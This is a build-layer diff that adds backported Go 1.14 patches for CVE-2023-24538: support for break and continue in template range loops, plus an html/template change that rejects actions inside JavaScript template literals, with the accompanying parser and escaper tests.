+ // A nil return means the next item is not a term.
+ func (t *Tree) term() Node {
+ switch token := t.nextNonSpace(); token.typ {
+- case itemError:
+- t.errorf("%s", token.val)
+ case itemIdentifier:
+ if !t.hasFunction(token.val) {
+ t.errorf("function %q not defined", token.val)
+@@ -699,11 +710,7 @@ func (t *Tree) term() Node {
+ }
+ return number
+ case itemLeftParen:
+- pipe := t.pipeline("parenthesized pipeline")
+- if token := t.next(); token.typ != itemRightParen {
+- t.errorf("unclosed right paren: unexpected %s", token)
+- }
+- return pipe
++ return t.pipeline("parenthesized pipeline", itemRightParen)
+ case itemString, itemRawString:
+ s, err := strconv.Unquote(token.val)
+ if err != nil {
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index d9c13c5..220f984 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -250,6 +250,13 @@ var parseTests = []parseTest{
+ {"comment trim left and right", "x \r\n\t{{- /* */ -}}\n\n\ty", noError, `"x""y"`},
+ {"block definition", `{{block "foo" .}}hello{{end}}`, noError,
+ `{{template "foo" .}}`},
++
++ {"newline in assignment", "{{ $x \n := \n 1 \n }}", noError, "{{$x := 1}}"},
++ {"newline in empty action", "{{\n}}", hasError, "{{\n}}"},
++ {"newline in pipeline", "{{\n\"x\"\n|\nprintf\n}}", noError, `{{"x" | printf}}`},
++ {"newline in comment", "{{/*\nhello\n*/}}", noError, ""},
++ {"newline in comment", "{{-\n/*\nhello\n*/\n-}}", noError, ""},
++
+ // Errors.
+ {"unclosed action", "hello{{range", hasError, ""},
+ {"unmatched end", "{{end}}", hasError, ""},
+@@ -426,23 +433,38 @@ var errorTests = []parseTest{
+ // Check line numbers are accurate.
+ {"unclosed1",
+ "line1\n{{",
+- hasError, `unclosed1:2: unexpected unclosed action in command`},
++ hasError, `unclosed1:2: unclosed action`},
+ {"unclosed2",
+ "line1\n{{define `x`}}line2\n{{",
+- hasError, `unclosed2:3: unexpected unclosed action in command`},
++ hasError, `unclosed2:3: unclosed action`},
++ {"unclosed3",
++ "line1\n{{\"x\"\n\"y\"\n",
++ hasError, `unclosed3:4: unclosed action started at unclosed3:2`},
++ {"unclosed4",
++ "{{\n\n\n\n\n",
++ hasError, `unclosed4:6: unclosed action started at unclosed4:1`},
++ {"var1",
++ "line1\n{{\nx\n}}",
++ hasError, `var1:3: function "x" not defined`},
+ // Specific errors.
+ {"function",
+ "{{foo}}",
+ hasError, `function "foo" not defined`},
+- {"comment",
++ {"comment1",
+ "{{/*}}",
+- hasError, `unclosed comment`},
++ hasError, `comment1:1: unclosed comment`},
++ {"comment2",
++ "{{/*\nhello\n}}",
++ hasError, `comment2:1: unclosed comment`},
+ {"lparen",
+ "{{.X (1 2 3}}",
+ hasError, `unclosed left paren`},
+ {"rparen",
+- "{{.X 1 2 3)}}",
+- hasError, `unexpected ")"`},
++ "{{.X 1 2 3 ) }}",
++ hasError, `unexpected ")" in command`},
++ {"rparen2",
++ "{{(.X 1 2 3",
++ hasError, `unclosed action`},
+ {"space",
+ "{{`x`3}}",
+ hasError, `in operand`},
+@@ -488,7 +510,7 @@ var errorTests = []parseTest{
+ hasError, `missing value for parenthesized pipeline`},
+ {"multilinerawstring",
+ "{{ $v := `\n` }} {{",
+- hasError, `multilinerawstring:2: unexpected unclosed action`},
++ hasError, `multilinerawstring:2: unclosed action`},
+ {"rangeundefvar",
+ "{{range $k}}{{end}}",
+ hasError, `undefined variable`},
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch
new file mode 100644
index 0000000000..fc38929648
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_5.patch
@@ -0,0 +1,585 @@
+From e0e6bca6ddc0e6d9fa3a5b644af9b446924fbf83 Mon Sep 17 00:00:00 2001
+From: Russ Cox <rsc@golang.org>
+Date: Thu, 20 May 2021 12:46:33 -0400
+Subject: [PATCH 5/6] html/template, text/template: implement break and
+ continue for range loops
+
+Break and continue for range loops was accepted as a proposal in June 2017.
+It was implemented in CL 66410 (Oct 2017)
+but then rolled back in CL 92155 (Feb 2018)
+because html/template changes had not been implemented.
+
+This CL reimplements break and continue in text/template
+and then adds support for them in html/template as well.
+
+Fixes #20531.
+
+Change-Id: I05330482a976f1c078b4b49c2287bd9031bb7616
+Reviewed-on: https://go-review.googlesource.com/c/go/+/321491
+Trust: Russ Cox <rsc@golang.org>
+Run-TryBot: Russ Cox <rsc@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Rob Pike <r@golang.org>
+
+Dependency Patch #5
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/d0dd26a88c019d54f22463daae81e785f5867565
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/context.go | 4 ++
+ src/html/template/escape.go | 71 ++++++++++++++++++++++++++++++++++-
+ src/html/template/escape_test.go | 24 ++++++++++++
+ src/text/template/doc.go | 8 ++++
+ src/text/template/exec.go | 24 +++++++++++-
+ src/text/template/exec_test.go | 2 +
+ src/text/template/parse/lex.go | 13 ++++++-
+ src/text/template/parse/lex_test.go | 2 +
+ src/text/template/parse/node.go | 36 ++++++++++++++++++
+ src/text/template/parse/parse.go | 42 ++++++++++++++++++++-
+ src/text/template/parse/parse_test.go | 8 ++++
+ 11 files changed, 230 insertions(+), 4 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index f7d4849..aaa7d08 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -6,6 +6,7 @@ package template
+
+ import (
+ "fmt"
++ "text/template/parse"
+ )
+
+ // context describes the state an HTML parser must be in when it reaches the
+@@ -22,6 +23,7 @@ type context struct {
+ jsCtx jsCtx
+ attr attr
+ element element
++ n parse.Node // for range break/continue
+ err *Error
+ }
+
+@@ -141,6 +143,8 @@ const (
+ // stateError is an infectious error state outside any valid
+ // HTML/CSS/JS construct.
+ stateError
++ // stateDead marks unreachable code after a {{break}} or {{continue}}.
++ stateDead
+ )
+
+ // isComment is true for any state that contains content meant for template
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index 8739735..6dea79c 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -97,6 +97,15 @@ type escaper struct {
+ actionNodeEdits map[*parse.ActionNode][]string
+ templateNodeEdits map[*parse.TemplateNode]string
+ textNodeEdits map[*parse.TextNode][]byte
++ // rangeContext holds context about the current range loop.
++ rangeContext *rangeContext
++}
++
++// rangeContext holds information about the current range loop.
++type rangeContext struct {
++ outer *rangeContext // outer loop
++ breaks []context // context at each break action
++ continues []context // context at each continue action
+ }
+
+ // makeEscaper creates a blank escaper for the given set.
+@@ -109,6 +118,7 @@ func makeEscaper(n *nameSpace) escaper {
+ map[*parse.ActionNode][]string{},
+ map[*parse.TemplateNode]string{},
+ map[*parse.TextNode][]byte{},
++ nil,
+ }
+ }
+
+@@ -124,8 +134,16 @@ func (e *escaper) escape(c context, n parse.Node) context {
+ switch n := n.(type) {
+ case *parse.ActionNode:
+ return e.escapeAction(c, n)
++ case *parse.BreakNode:
++ c.n = n
++ e.rangeContext.breaks = append(e.rangeContext.breaks, c)
++ return context{state: stateDead}
+ case *parse.CommentNode:
+ return c
++ case *parse.ContinueNode:
++ c.n = n
++ e.rangeContext.continues = append(e.rangeContext.breaks, c)
++ return context{state: stateDead}
+ case *parse.IfNode:
+ return e.escapeBranch(c, &n.BranchNode, "if")
+ case *parse.ListNode:
+@@ -427,6 +445,12 @@ func join(a, b context, node parse.Node, nodeName string) context {
+ if b.state == stateError {
+ return b
+ }
++ if a.state == stateDead {
++ return b
++ }
++ if b.state == stateDead {
++ return a
++ }
+ if a.eq(b) {
+ return a
+ }
+@@ -466,14 +490,27 @@ func join(a, b context, node parse.Node, nodeName string) context {
+
+ // escapeBranch escapes a branch template node: "if", "range" and "with".
+ func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string) context {
++ if nodeName == "range" {
++ e.rangeContext = &rangeContext{outer: e.rangeContext}
++ }
+ c0 := e.escapeList(c, n.List)
+- if nodeName == "range" && c0.state != stateError {
++ if nodeName == "range" {
++ if c0.state != stateError {
++ c0 = joinRange(c0, e.rangeContext)
++ }
++ e.rangeContext = e.rangeContext.outer
++ if c0.state == stateError {
++ return c0
++ }
++
+ // The "true" branch of a "range" node can execute multiple times.
+ // We check that executing n.List once results in the same context
+ // as executing n.List twice.
++ e.rangeContext = &rangeContext{outer: e.rangeContext}
+ c1, _ := e.escapeListConditionally(c0, n.List, nil)
+ c0 = join(c0, c1, n, nodeName)
+ if c0.state == stateError {
++ e.rangeContext = e.rangeContext.outer
+ // Make clear that this is a problem on loop re-entry
+ // since developers tend to overlook that branch when
+ // debugging templates.
+@@ -481,11 +518,39 @@ func (e *escaper) escapeBranch(c context, n *parse.BranchNode, nodeName string)
+ c0.err.Description = "on range loop re-entry: " + c0.err.Description
+ return c0
+ }
++ c0 = joinRange(c0, e.rangeContext)
++ e.rangeContext = e.rangeContext.outer
++ if c0.state == stateError {
++ return c0
++ }
+ }
+ c1 := e.escapeList(c, n.ElseList)
+ return join(c0, c1, n, nodeName)
+ }
+
++func joinRange(c0 context, rc *rangeContext) context {
++ // Merge contexts at break and continue statements into overall body context.
++ // In theory we could treat breaks differently from continues, but for now it is
++ // enough to treat them both as going back to the start of the loop (which may then stop).
++ for _, c := range rc.breaks {
++ c0 = join(c0, c, c.n, "range")
++ if c0.state == stateError {
++ c0.err.Line = c.n.(*parse.BreakNode).Line
++ c0.err.Description = "at range loop break: " + c0.err.Description
++ return c0
++ }
++ }
++ for _, c := range rc.continues {
++ c0 = join(c0, c, c.n, "range")
++ if c0.state == stateError {
++ c0.err.Line = c.n.(*parse.ContinueNode).Line
++ c0.err.Description = "at range loop continue: " + c0.err.Description
++ return c0
++ }
++ }
++ return c0
++}
++
+ // escapeList escapes a list template node.
+ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ if n == nil {
+@@ -493,6 +558,9 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ }
+ for _, m := range n.Nodes {
+ c = e.escape(c, m)
++ if c.state == stateDead {
++ break
++ }
+ }
+ return c
+ }
+@@ -503,6 +571,7 @@ func (e *escaper) escapeList(c context, n *parse.ListNode) context {
+ // which is the same as whether e was updated.
+ func (e *escaper) escapeListConditionally(c context, n *parse.ListNode, filter func(*escaper, context) bool) (context, bool) {
+ e1 := makeEscaper(e.ns)
++ e1.rangeContext = e.rangeContext
+ // Make type inferences available to f.
+ for k, v := range e.output {
+ e1.output[k] = v
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index c709660..fa2b84a 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -920,6 +920,22 @@ func TestErrors(t *testing.T) {
+ "<a href='/foo?{{range .Items}}&{{.K}}={{.V}}{{end}}'>",
+ "",
+ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{continue}}{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{break}}{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
++ "",
++ },
+ // Error cases.
+ {
+ "{{if .Cond}}<a{{end}}",
+@@ -956,6 +972,14 @@ func TestErrors(t *testing.T) {
+ "z:2:8: on range loop re-entry: {{range}} branches",
+ },
+ {
++ "{{range .Items}}<a{{if .X}}{{break}}{{end}}>{{end}}",
++ "z:1:29: at range loop break: {{range}} branches end in different contexts",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{continue}}{{end}}>{{end}}",
++ "z:1:29: at range loop continue: {{range}} branches end in different contexts",
++ },
++ {
+ "<a b=1 c={{.H}}",
+ "z: ends in a non-text context: {stateAttr delimSpaceOrTagEnd",
+ },
+diff --git a/src/text/template/doc.go b/src/text/template/doc.go
+index 7b30294..0228b15 100644
+--- a/src/text/template/doc.go
++++ b/src/text/template/doc.go
+@@ -112,6 +112,14 @@ data, defined in detail in the corresponding sections that follow.
+ T0 is executed; otherwise, dot is set to the successive elements
+ of the array, slice, or map and T1 is executed.
+
++ {{break}}
++ The innermost {{range pipeline}} loop is ended early, stopping the
++ current iteration and bypassing all remaining iterations.
++
++ {{continue}}
++ The current iteration of the innermost {{range pipeline}} loop is
++ stopped, and the loop starts the next iteration.
++
+ {{template "name"}}
+ The template with the specified name is executed with nil data.
+
+diff --git a/src/text/template/exec.go b/src/text/template/exec.go
+index 7ac5175..6cb140a 100644
+--- a/src/text/template/exec.go
++++ b/src/text/template/exec.go
+@@ -5,6 +5,7 @@
+ package template
+
+ import (
++ "errors"
+ "fmt"
+ "internal/fmtsort"
+ "io"
+@@ -244,6 +245,12 @@ func (t *Template) DefinedTemplates() string {
+ return b.String()
+ }
+
++// Sentinel errors for use with panic to signal early exits from range loops.
++var (
++ walkBreak = errors.New("break")
++ walkContinue = errors.New("continue")
++)
++
+ // Walk functions step through the major pieces of the template structure,
+ // generating output as they go.
+ func (s *state) walk(dot reflect.Value, node parse.Node) {
+@@ -256,7 +263,11 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
+ if len(node.Pipe.Decl) == 0 {
+ s.printValue(node, val)
+ }
++ case *parse.BreakNode:
++ panic(walkBreak)
+ case *parse.CommentNode:
++ case *parse.ContinueNode:
++ panic(walkContinue)
+ case *parse.IfNode:
+ s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
+ case *parse.ListNode:
+@@ -335,6 +346,11 @@ func isTrue(val reflect.Value) (truth, ok bool) {
+
+ func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
+ s.at(r)
++ defer func() {
++ if r := recover(); r != nil && r != walkBreak {
++ panic(r)
++ }
++ }()
+ defer s.pop(s.mark())
+ val, _ := indirect(s.evalPipeline(dot, r.Pipe))
+ // mark top of stack before any variables in the body are pushed.
+@@ -348,8 +364,14 @@ func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
+ if len(r.Pipe.Decl) > 1 {
+ s.setTopVar(2, index)
+ }
++ defer s.pop(mark)
++ defer func() {
++ // Consume panic(walkContinue)
++ if r := recover(); r != nil && r != walkContinue {
++ panic(r)
++ }
++ }()
+ s.walk(elem, r.List)
+- s.pop(mark)
+ }
+ switch val.Kind() {
+ case reflect.Array, reflect.Slice:
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index 3309b33..a639f44 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -563,6 +563,8 @@ var execTests = []execTest{
+ {"range empty no else", "{{range .SIEmpty}}-{{.}}-{{end}}", "", tVal, true},
+ {"range []int else", "{{range .SI}}-{{.}}-{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
+ {"range empty else", "{{range .SIEmpty}}-{{.}}-{{else}}EMPTY{{end}}", "EMPTY", tVal, true},
++ {"range []int break else", "{{range .SI}}-{{.}}-{{break}}NOTREACHED{{else}}EMPTY{{end}}", "-3-", tVal, true},
++ {"range []int continue else", "{{range .SI}}-{{.}}-{{continue}}NOTREACHED{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
+ {"range []bool", "{{range .SB}}-{{.}}-{{end}}", "-true--false-", tVal, true},
+ {"range []int method", "{{range .SI | .MAdd .I}}-{{.}}-{{end}}", "-20--21--22-", tVal, true},
+ {"range map", "{{range .MSI}}-{{.}}-{{end}}", "-1--3--2-", tVal, true},
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index 6784071..95e3377 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -62,6 +62,8 @@ const (
+ // Keywords appear after all the rest.
+ itemKeyword // used only to delimit the keywords
+ itemBlock // block keyword
++ itemBreak // break keyword
++ itemContinue // continue keyword
+ itemDot // the cursor, spelled '.'
+ itemDefine // define keyword
+ itemElse // else keyword
+@@ -76,6 +78,8 @@ const (
+ var key = map[string]itemType{
+ ".": itemDot,
+ "block": itemBlock,
++ "break": itemBreak,
++ "continue": itemContinue,
+ "define": itemDefine,
+ "else": itemElse,
+ "end": itemEnd,
+@@ -119,6 +123,8 @@ type lexer struct {
+ parenDepth int // nesting depth of ( ) exprs
+ line int // 1+number of newlines seen
+ startLine int // start line of this item
++ breakOK bool // break keyword allowed
++ continueOK bool // continue keyword allowed
+ }
+
+ // next returns the next rune in the input.
+@@ -461,7 +467,12 @@ Loop:
+ }
+ switch {
+ case key[word] > itemKeyword:
+- l.emit(key[word])
++ item := key[word]
++ if item == itemBreak && !l.breakOK || item == itemContinue && !l.continueOK {
++ l.emit(itemIdentifier)
++ } else {
++ l.emit(item)
++ }
+ case word[0] == '.':
+ l.emit(itemField)
+ case word == "true", word == "false":
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index 6510eed..df6aabf 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -35,6 +35,8 @@ var itemName = map[itemType]string{
+ // keywords
+ itemDot: ".",
+ itemBlock: "block",
++ itemBreak: "break",
++ itemContinue: "continue",
+ itemDefine: "define",
+ itemElse: "else",
+ itemIf: "if",
+diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
+index a9dad5e..c398da0 100644
+--- a/src/text/template/parse/node.go
++++ b/src/text/template/parse/node.go
+@@ -71,6 +71,8 @@ const (
+ NodeVariable // A $ variable.
+ NodeWith // A with action.
+ NodeComment // A comment.
++ NodeBreak // A break action.
++ NodeContinue // A continue action.
+ )
+
+ // Nodes.
+@@ -907,6 +909,40 @@ func (i *IfNode) Copy() Node {
+ return i.tr.newIf(i.Pos, i.Line, i.Pipe.CopyPipe(), i.List.CopyList(), i.ElseList.CopyList())
+ }
+
++// BreakNode represents a {{break}} action.
++type BreakNode struct {
++ tr *Tree
++ NodeType
++ Pos
++ Line int
++}
++
++func (t *Tree) newBreak(pos Pos, line int) *BreakNode {
++ return &BreakNode{tr: t, NodeType: NodeBreak, Pos: pos, Line: line}
++}
++
++func (b *BreakNode) Copy() Node { return b.tr.newBreak(b.Pos, b.Line) }
++func (b *BreakNode) String() string { return "{{break}}" }
++func (b *BreakNode) tree() *Tree { return b.tr }
++func (b *BreakNode) writeTo(sb *strings.Builder) { sb.WriteString("{{break}}") }
++
++// ContinueNode represents a {{continue}} action.
++type ContinueNode struct {
++ tr *Tree
++ NodeType
++ Pos
++ Line int
++}
++
++func (t *Tree) newContinue(pos Pos, line int) *ContinueNode {
++ return &ContinueNode{tr: t, NodeType: NodeContinue, Pos: pos, Line: line}
++}
++
++func (c *ContinueNode) Copy() Node { return c.tr.newContinue(c.Pos, c.Line) }
++func (c *ContinueNode) String() string { return "{{continue}}" }
++func (c *ContinueNode) tree() *Tree { return c.tr }
++func (c *ContinueNode) writeTo(sb *strings.Builder) { sb.WriteString("{{continue}}") }
++
+ // RangeNode represents a {{range}} action and its commands.
+ type RangeNode struct {
+ BranchNode
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index 5e6e512..7f78b56 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -31,6 +31,7 @@ type Tree struct {
+ vars []string // variables defined at the moment.
+ treeSet map[string]*Tree
+ actionLine int // line of left delim starting action
++ rangeDepth int
+ mode Mode
+ }
+
+@@ -223,6 +224,8 @@ func (t *Tree) startParse(funcs []map[string]interface{}, lex *lexer, treeSet ma
+ t.vars = []string{"$"}
+ t.funcs = funcs
+ t.treeSet = treeSet
++ lex.breakOK = !t.hasFunction("break")
++ lex.continueOK = !t.hasFunction("continue")
+ }
+
+ // stopParse terminates parsing.
+@@ -385,6 +388,10 @@ func (t *Tree) action() (n Node) {
+ switch token := t.nextNonSpace(); token.typ {
+ case itemBlock:
+ return t.blockControl()
++ case itemBreak:
++ return t.breakControl(token.pos, token.line)
++ case itemContinue:
++ return t.continueControl(token.pos, token.line)
+ case itemElse:
+ return t.elseControl()
+ case itemEnd:
+@@ -404,6 +411,32 @@ func (t *Tree) action() (n Node) {
+ return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
+ }
+
++// Break:
++// {{break}}
++// Break keyword is past.
++func (t *Tree) breakControl(pos Pos, line int) Node {
++ if token := t.next(); token.typ != itemRightDelim {
++ t.unexpected(token, "in {{break}}")
++ }
++ if t.rangeDepth == 0 {
++ t.errorf("{{break}} outside {{range}}")
++ }
++ return t.newBreak(pos, line)
++}
++
++// Continue:
++// {{continue}}
++// Continue keyword is past.
++func (t *Tree) continueControl(pos Pos, line int) Node {
++ if token := t.next(); token.typ != itemRightDelim {
++ t.unexpected(token, "in {{continue}}")
++ }
++ if t.rangeDepth == 0 {
++ t.errorf("{{continue}} outside {{range}}")
++ }
++ return t.newContinue(pos, line)
++}
++
+ // Pipeline:
+ // declarations? command ('|' command)*
+ func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
+@@ -479,8 +512,14 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
+ func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
+ defer t.popVars(len(t.vars))
+ pipe = t.pipeline(context, itemRightDelim)
++ if context == "range" {
++ t.rangeDepth++
++ }
+ var next Node
+ list, next = t.itemList()
++ if context == "range" {
++ t.rangeDepth--
++ }
+ switch next.Type() {
+ case nodeEnd: //done
+ case nodeElse:
+@@ -522,7 +561,8 @@ func (t *Tree) ifControl() Node {
+ // {{range pipeline}} itemList {{else}} itemList {{end}}
+ // Range keyword is past.
+ func (t *Tree) rangeControl() Node {
+- return t.newRange(t.parseControl(false, "range"))
++ r := t.newRange(t.parseControl(false, "range"))
++ return r
+ }
+
+ // With:
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index 220f984..ba45636 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -230,6 +230,10 @@ var parseTests = []parseTest{
+ `{{range $x := .SI}}{{.}}{{end}}`},
+ {"range 2 vars", "{{range $x, $y := .SI}}{{.}}{{end}}", noError,
+ `{{range $x, $y := .SI}}{{.}}{{end}}`},
++ {"range with break", "{{range .SI}}{{.}}{{break}}{{end}}", noError,
++ `{{range .SI}}{{.}}{{break}}{{end}}`},
++ {"range with continue", "{{range .SI}}{{.}}{{continue}}{{end}}", noError,
++ `{{range .SI}}{{.}}{{continue}}{{end}}`},
+ {"constants", "{{range .SI 1 -3.2i true false 'a' nil}}{{end}}", noError,
+ `{{range .SI 1 -3.2i true false 'a' nil}}{{end}}`},
+ {"template", "{{template `x`}}", noError,
+@@ -279,6 +283,10 @@ var parseTests = []parseTest{
+ {"adjacent args", "{{printf 3`x`}}", hasError, ""},
+ {"adjacent args with .", "{{printf `x`.}}", hasError, ""},
+ {"extra end after if", "{{if .X}}a{{else if .Y}}b{{end}}{{end}}", hasError, ""},
++ {"break outside range", "{{range .}}{{end}} {{break}}", hasError, ""},
++ {"continue outside range", "{{range .}}{{end}} {{continue}}", hasError, ""},
++ {"break in range else", "{{range .}}{{else}}{{break}}{{end}}", hasError, ""},
++ {"continue in range else", "{{range .}}{{else}}{{continue}}{{end}}", hasError, ""},
+ // Other kinds of assignments and operators aren't available yet.
+ {"bug0a", "{{$x := 0}}{{$x}}", noError, "{{$x := 0}}{{$x}}"},
+ {"bug0b", "{{$x += 1}}{{$x}}", hasError, ""},
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch
new file mode 100644
index 0000000000..baf400b891
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch
@@ -0,0 +1,371 @@
+From 16f4882984569f179d73967c9eee679bb9b098c5 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Mon, 20 Mar 2023 11:01:13 -0700
+Subject: [PATCH 6/6] html/template: disallow actions in JS template literals
+
+ECMAScript 6 introduced template literals[0][1] which are delimited with
+backticks. These need to be escaped in a similar fashion to the
+delimiters for other string literals. Additionally template literals can
+contain special syntax for string interpolation.
+
+There is no clear way to allow safe insertion of actions within JS
+template literals, as handling (JS) string interpolation inside of these
+literals is rather complex. As such we've chosen to simply disallow
+template actions within these template literals.
+
+A new error code is added for this parsing failure case, errJsTmplLit,
+but it is unexported as it is not backwards compatible with other minor
+release versions to introduce an API change in a minor release. We will
+export this code in the next major release.
+
+The previous behavior (with the cavet that backticks are now escaped
+properly) can be re-enabled with GODEBUG=jstmpllitinterp=1.
+
+This change subsumes CL471455.
+
+Thanks to Sohom Datta, Manipal Institute of Technology, for reporting
+this issue.
+
+Fixes CVE-2023-24538
+For #59234
+Fixes #59271
+
+[0] https://tc39.es/ecma262/multipage/ecmascript-language-expressions.html#sec-template-literals
+[1] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802457
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802612
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: Ic7f10595615f2b2740d9c85ad7ef40dc0e78c04c
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481987
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/b1e3ecfa06b67014429a197ec5e134ce4303ad9b
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/context.go | 2 ++
+ src/html/template/error.go | 13 ++++++++
+ src/html/template/escape.go | 11 +++++++
+ src/html/template/escape_test.go | 66 ++++++++++++++++++++++-----------------
+ src/html/template/js.go | 2 ++
+ src/html/template/js_test.go | 2 +-
+ src/html/template/jsctx_string.go | 9 ++++++
+ src/html/template/state_string.go | 37 ++++++++++++++++++++--
+ src/html/template/transition.go | 7 ++++-
+ 9 files changed, 116 insertions(+), 33 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index f7d4849..0b65313 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -116,6 +116,8 @@ const (
+ stateJSDqStr
+ // stateJSSqStr occurs inside a JavaScript single quoted string.
+ stateJSSqStr
++ // stateJSBqStr occurs inside a JavaScript back quoted string.
++ stateJSBqStr
+ // stateJSRegexp occurs inside a JavaScript regexp literal.
+ stateJSRegexp
+ // stateJSBlockCmt occurs inside a JavaScript /* block comment */.
+diff --git a/src/html/template/error.go b/src/html/template/error.go
+index 0e52706..fd26b64 100644
+--- a/src/html/template/error.go
++++ b/src/html/template/error.go
+@@ -211,6 +211,19 @@ const (
+ // pipeline occurs in an unquoted attribute value context, "html" is
+ // disallowed. Avoid using "html" and "urlquery" entirely in new templates.
+ ErrPredefinedEscaper
++
++ // errJSTmplLit: "... appears in a JS template literal"
++ // Example:
++ // <script>var tmpl = `{{.Interp}`</script>
++ // Discussion:
++ // Package html/template does not support actions inside of JS template
++ // literals.
++ //
++ // TODO(rolandshoemaker): we cannot add this as an exported error in a minor
++ // release, since it is backwards incompatible with the other minor
++ // releases. As such we need to leave it unexported, and then we'll add it
++ // in the next major release.
++ errJSTmplLit
+ )
+
+ func (e *Error) Error() string {
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index f12dafa..29ca5b3 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -8,6 +8,7 @@ import (
+ "bytes"
+ "fmt"
+ "html"
++ "internal/godebug"
+ "io"
+ "text/template"
+ "text/template/parse"
+@@ -203,6 +204,16 @@ func (e *escaper) escapeAction(c context, n *parse.ActionNode) context {
+ c.jsCtx = jsCtxDivOp
+ case stateJSDqStr, stateJSSqStr:
+ s = append(s, "_html_template_jsstrescaper")
++ case stateJSBqStr:
++ debugAllowActionJSTmpl := godebug.Get("jstmpllitinterp")
++ if debugAllowActionJSTmpl == "1" {
++ s = append(s, "_html_template_jsstrescaper")
++ } else {
++ return context{
++ state: stateError,
++ err: errorf(errJSTmplLit, n, n.Line, "%s appears in a JS template literal", n),
++ }
++ }
+ case stateJSRegexp:
+ s = append(s, "_html_template_jsregexpescaper")
+ case stateCSS:
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index fa2b84a..1b150e9 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -681,35 +681,31 @@ func TestEscape(t *testing.T) {
+ }
+
+ for _, test := range tests {
+- tmpl := New(test.name)
+- tmpl = Must(tmpl.Parse(test.input))
+- // Check for bug 6459: Tree field was not set in Parse.
+- if tmpl.Tree != tmpl.text.Tree {
+- t.Errorf("%s: tree not set properly", test.name)
+- continue
+- }
+- b := new(bytes.Buffer)
+- if err := tmpl.Execute(b, data); err != nil {
+- t.Errorf("%s: template execution failed: %s", test.name, err)
+- continue
+- }
+- if w, g := test.output, b.String(); w != g {
